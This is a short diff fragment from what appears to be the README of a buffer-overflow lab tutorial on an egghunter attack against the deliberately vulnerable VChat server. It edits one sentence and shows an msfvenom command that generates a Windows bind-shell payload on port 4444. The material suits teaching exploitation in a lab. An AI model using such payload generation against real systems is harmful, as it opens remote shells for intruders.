DaintyJet/VChat_GTER_EggHunter/README.md

 		<img src="Images/I28.png" width=600>

-3. We will also need a bind shell, this is a program that listens for connections on the target machine and provides a shell to someone that makes a tcp connection.
+3. We will also need a bind shell, this is a program that listens for connections on the target machine and provides a shell to anyone that makes a tcp connection.
 We can generate the shell with the following command.
 	```
 	$ msfvenom -p windows/shell_bind_tcp RPORT=4444 EXITFUNC=thread -f python -v SHELL -b '\x00'
 	```